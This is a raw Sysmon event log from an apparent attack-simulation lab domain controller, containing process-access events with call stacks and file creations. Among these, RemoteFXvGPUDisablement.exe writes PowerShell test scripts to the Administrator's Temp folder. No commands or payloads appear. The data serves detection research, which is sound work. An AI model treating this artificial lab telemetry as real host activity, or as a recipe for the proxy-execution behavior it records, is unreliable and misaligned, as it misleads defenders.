12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1501-00000000AE01}6264C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1501-00000000AE01}6264C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11241268C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6BA04DBC9D9FAAEDCC92251CEED5F99,SHA256=A2413F9A8E1E74371C6FFDD4F8A4A35CB153F7A07115F31FFB18C5DA4406421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.185{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEF3A0EF49C838CD971E43DF14B28DD2,SHA256=07E7E79FB130B3F9B184C41CD94C2AB205EDF6E23B26CAB177BF9428F0DC580E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.854{266CAFBE-6521-6064-1601-00000000AE01}7048ATTACKRANGE\AdministratorC:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_w14cv5mb.y2v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.854{266CAFBE-6521-6064-1601-00000000AE01}7048ATTACKRANGE\AdministratorC:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jckgrbfc.fqd.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.823{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jckgrbfc.fqd.ps12021-03-31 12:03:46.823 10341000x80000000000000008941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.620{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.620{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.589{266CAFBE-646C-6064-1000-00000000AE01}1124NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\TMPEC69.tmpMD5=062256C5466024FDB2539E33454451BD,SHA256=FE80A2AC0793D186C8C8CC213131C2751493F6C3EDE18D5DAE70F03460ED7D01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6522-6064-1C01-00000000AE01}2632C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6522-6064-1C01-00000000AE01}2632C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
